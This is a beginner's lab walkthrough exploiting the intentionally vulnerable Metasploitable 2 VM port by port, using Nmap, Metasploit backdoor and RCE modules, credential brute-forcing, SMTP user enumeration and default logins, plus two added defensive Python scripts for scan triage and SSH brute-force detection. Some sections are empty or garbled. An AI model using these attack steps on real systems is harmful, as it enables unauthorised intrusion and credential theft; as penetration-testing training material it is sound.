(My first attempted exploits) Metasploitable 2 shell access via ports
To crack the Metasploitable 2 server, we start with an Nmap port scan. For my Metasploitable 2 VM the command is: nmap -p- 192.168.31.138 (nmap = the scanner, -p- = scan all 65535 TCP ports, 192.168.31.138 = the IP of Metasploitable 2).
The result looks like this:
To exploit the first open port, which is FTP, I first enumerate 21/tcp with this Nmap command: nmap -p 21 -A 192.168.31.138 (-p 21 = scan only port 21/tcp, -A = aggressive scan: version and OS detection, default scripts and traceroute).
I got this result:
Nmap scan report for 192.168.31.138
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.31.136
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:93:94:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms 192.168.31.138
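From a defender's side, the same Nmap report is an inventory record: the version string, the anonymous-login script result and the plain-text session status are exactly the fields you want flagged automatically. The parser below is an added example, not part of the original post; it embeds the report shown above as constructed input, and the WATCHLIST of versions to flag is an assumption of the example.

```python
import re

# Constructed sample: the nmap -p 21 -A report shown above, embedded so the
# script runs offline (lines not needed for the checks are omitted).
NMAP_REPORT = """\
Nmap scan report for 192.168.31.138
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Control connection is plain text
| Data connections will be plain text
|_End of status
"""

# Assumed watchlist: version strings a defender wants flagged as soon as they
# appear in an inventory (vsftpd 2.3.4 is the backdoored release named above).
WATCHLIST = {"vsftpd 2.3.4": "known backdoored release; replace immediately"}

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_report(text):
    """Return a list of {port, proto, state, service, version, script} dicts."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip(),
                          "script": []})
        elif line.startswith("|") and ports:
            # NSE script output lines belong to the most recent port entry
            ports[-1]["script"].append(line.lstrip("|_ ").strip())
    return ports


def triage(ports):
    """Map each port to the defender-relevant findings derived from the report."""
    findings = {}
    for p in ports:
        issues = []
        if p["version"] in WATCHLIST:
            issues.append(WATCHLIST[p["version"]])
        text = " ".join(p["script"])
        if "Anonymous FTP login allowed" in text:
            issues.append("anonymous FTP login enabled")
        if "plain text" in text:
            issues.append("credentials and data sent in clear text")
        findings[f"{p['port']}/{p['proto']}"] = issues
    return findings
```

Run triage(parse_report(NMAP_REPORT)) against a full -p- -A report and every port on the host gets the same three checks.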
FTP/21/TCP
Here the FTP service on port 21 is vsftpd 2.3.4, so let's find exploits related to vsftpd 2.3.4.
To find exploits, first open the Metasploit console by typing msfconsole in the terminal. The interface looks like this:
Now search for the vsftpd 2.3.4 service with the command search vsftpd 2.3.4. We find one Backdoor Command Execution exploit. To select it, type use 0, and to see what information the module needs, type options.
Only RPORT and RHOST need to be set (R means remote port/host). RPORT is already filled with the FTP port, so we only set the host: set rhost 192.168.31.138. Now to exploit, simply type run or exploit. The exploit runs, and the result looks similar to the image below:
Hurrah! The service is exploited. Let's type whoami to see which user we are:
We are root in the shell. Let's type pwd to print the working directory:
And we are in the root directory, so FTP/21/TCP has been cracked.
SSH/22/TCP
Let's dive into the SSH port 22/TCP. First scan port 22 with Nmap: nmap -T4 -p 22 -A 192.168.31.138 (-T4 = faster timing template, -p 22 = scan only the SSH port 22).
We find some extra information such as the version and the OS. SSH itself is hard to crack, so we have to brute-force it. For this, search for SSH modules in msfconsole with these steps:
msfconsole to open the framework
search openssh to search for SSH modules
use auxiliary/scanner/ssh/ssh_enumusers to find valid usernames
options to see what to provide
set RHOSTS 192.168.31.138 (use your own target IP)
set USER_FILE /usr/share/legion/wordlists/ssh-user.txt to try the usernames in this list
run to start the scan
Hurrah! We have found usernames:
Two users were found: root and msfadmin.
Now we can brute-force the password for that user with the SSH login module.
To do:
msfconsole to open the framework
search ssh_login to search for the SSH login module
use auxiliary/scanner/ssh/ssh_login to run the attack
options to see what to provide
set RHOSTS 192.168.31.138 (use your own target IP)
set username msfadmin to brute-force this username
set PASS_FILE /usr/share/legion/wordlists/ssh-pass-test.txt to try the passwords in this list
set STOP_ON_SUCCESS true to stop once a password is found
run to start the attack
And we found the password.
To log in, use this command: ssh username@target_ipaddress
For me it's ssh msfadmin@192.168.31.138
Then type the password msfadmin, and we are in!
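On the target, the ssh_login run above leaves a burst of "Failed password" lines for msfadmin in auth.log, followed by an "Accepted password" line from the same source once the list hits the right entry. The detector below is an added example, not part of the original post: it parses constructed sshd log lines modelled on that pattern and flags both the burst and the login that follows it; the threshold and window are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines: a burst of failures for msfadmin from one
# source, a success from that same source, then an unrelated normal login.
AUTH_LOG = """\
Jan 10 12:00:01 metasploitable sshd[4311]: Failed password for msfadmin from 192.168.31.136 port 40210 ssh2
Jan 10 12:00:01 metasploitable sshd[4313]: Failed password for msfadmin from 192.168.31.136 port 40212 ssh2
Jan 10 12:00:02 metasploitable sshd[4315]: Failed password for msfadmin from 192.168.31.136 port 40214 ssh2
Jan 10 12:00:02 metasploitable sshd[4317]: Failed password for invalid user admin from 192.168.31.136 port 40216 ssh2
Jan 10 12:00:03 metasploitable sshd[4319]: Failed password for msfadmin from 192.168.31.136 port 40218 ssh2
Jan 10 12:00:03 metasploitable sshd[4321]: Accepted password for msfadmin from 192.168.31.136 port 40220 ssh2
Jan 10 12:30:00 metasploitable sshd[4400]: Accepted password for msfadmin from 192.168.31.10 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2$"
)


def parse_auth_log(text, year=2024):
    """Return (timestamp, result, user, src) tuples for sshd password events."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd/PAM lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(events, threshold=5, window_s=60):
    """Alert when a source reaches `threshold` failures inside `window_s` seconds,
    and again when a login is accepted from that source while the burst is live."""
    failures = defaultdict(list)  # src -> timestamps of failures in the window
    alerts = []
    for ts, result, user, src in sorted(events, key=lambda e: e[0]):
        recent = [t for t in failures[src] if (ts - t).total_seconds() <= window_s]
        if result == "Failed":
            recent.append(ts)
            if len(recent) == threshold:  # fire once, when the line is crossed
                alerts.append(("bruteforce", src, user, ts))
        elif len(recent) >= threshold:
            alerts.append(("success_after_bruteforce", src, user, ts))
        failures[src] = recent
    return alerts
```

The second alert type is the one worth paging on: a password accepted right after a burst of failures is the signature of a guessed credential rather than a typo.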
Telnet/23/TCP
For Telnet on 23/tcp, first run an Nmap scan: nmap -T4 -p 23 -A 192.168.31.138 (-p 23 = scan only port 23).
The result looks similar to this:
Nothing very useful here.
So let's connect with telnet 192.168.31.138. The login banner hands us the credentials:
Let's try logging in with this information.
And we are connected. Hurray!
SMTP/25/TCP
For SMTP on 25/tcp, let's do a quick Nmap scan with nmap -T4 -p 25 -A 192.168.31.138
The result looks similar to this:
We found some information, such as the version: Postfix smtpd
So we will follow the below steps:
msfconsole to open the framework
search smtp_enum to find the SMTP user enumeration module
use auxiliary/scanner/smtp/smtp_enum to enumerate usernames
options to see what to provide
set RHOSTS 192.168.31.138 (use your own target IP)
run to start the enumeration
Now we have to verify the guessed users: “backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, mysql, news, nobody, postfix, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data”
Let's pick some interesting ones using common sense. I selected user, service, sshd, and daemon.
Now let's verify them with the following steps:
telnet 192.168.31.138 25
vrfy user, vrfy service, vrfy sshd, vrfy daemon (one by one)
For me, all of these came back as verified.
The result was:
vrfy user
252 2.0.0 user
vrfy service
252 2.0.0 service
vrfy sshd
252 2.0.0 sshd
vrfy daemon
252 2.0.0 daemon
A 252 response means the server accepted the address, so the user is verified.
And that is about the most we can do with SMTP.
Domain/53/TCP
Let's do some Nmap. The command used is nmap -T4 -p 53 -A 192.168.31.138.
The version found is ISC BIND 9.4.2.
Http/80/TCP
Let's do some Nmap. The command used is nmap -T4 -p 80 -A 192.168.31.138.
We can see the version is Apache httpd 2.2.8 ((Ubuntu) DAV/2).
Now let's find some directories on 192.168.31.138 with DirBuster.
Here are the steps:
Type dirbuster in the terminal.
Use these settings:
Press the Start button.
Here we found http://192.168.31.138:80/index.php, so the server definitely runs PHP. In msfconsole, search php_cgi and use exploit/multi/http/php_cgi_arg_injection. Set RHOSTS 192.168.31.138 (use your own target IP) and run. We get shell access to the service.
rpcbind/111/TCP
After running Nmap, I found the service version is 2 (RPC #100000).
netbios-ssn/139/TCP
Let's run the Nmap scan with nmap -p 139 -A 192.168.31.138. The version found is Samba smbd 3.0.20-Debian (workgroup: WORKGROUP), and the domain name is localdomain.
So in msfconsole, type search 3.0.20. We have an exploit:
To use it, type use exploit/multi/samba/usermap_script, then follow these steps:
options to see the options.
set rhosts 192.168.31.138 in the msfconsole.
The port is already set to 139.
Now type set lport 4445
Now run.
And we have shell access. Let's verify it by typing whoami
microsoft-ds/445/TCP
Let's run Nmap on port 445. The version is Samba smbd 3.0.20-Debian, and we can use msfconsole to crack it. Follow these steps:
use exploit/multi/samba/usermap_script
options to see the options.
set rhosts 192.168.31.138 in the msfconsole.
set rport 445
Now type set lport 4445
Now run.
And we have shell access. Let's verify it by typing whoami
Exec, login, shell/512, 513, 514/TCP
To get a shell through all of the above ports, only a few simple steps are needed:
sudo apt install rsh-redone-client
rlogin -l root 192.168.31.138
And you are in. Type whoami or any other command.
rmiregistry/1099/TCP
To access port 1099, go to msfconsole and type use multi/misc/java_rmi_server. Then set rhost 192.168.31.138 and simply type run.
And you are in.
ingreslock/1524/TCP
Just type: netcat 192.168.31.138 1524.
And we have access.
nfs/2049/TCP
ccproxy-ftp/2121/TCP
First go to msfconsole and type use auxiliary/scanner/ftp/ftp_login.
Then follow these settings:
Then type run.
And the password is found:
Now to access the service, type ftp msfadmin@192.168.31.138 2121 and enter the password msfadmin.
And we are in!
mysql/3306/TCP
To exploit mysql we have to follow the below steps:
msfconsole
search mysql_login
use auxiliary/scanner/mysql/mysql_login
options
set rhosts 192.168.31.138
set STOP_ON_SUCCESS true
set USERNAME
set USERNAME -
set USERNAME
set USERNAME /
set userpass_file /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
(Enter each of the above commands one by one)
And hurray! You are in!
To access the database, run mysql -h 192.168.31.138 -u msfadmin and enter an empty password (“”).
distccd/3632/TCP
postgresql/5432/TCP
First go to msfconsole, then use the commands shown below:
Now type exploit and press Enter.
And you have the password.
Now open a new terminal and type: psql -h 192.168.31.138 -U postgres -d template1.
In the password field, type postgres. That's it, you are in:
vnc/5900/TCP
Open msfconsole and type: use auxiliary/scanner/vnc/vnc_login
Now use the commands below in your terminal:
After typing exploit, you get the password, which is “password”.
To gain access, type vncviewer 192.168.31.138:5900 and enter “password” in the password field. That's it, you are in!
x11/6000/TCP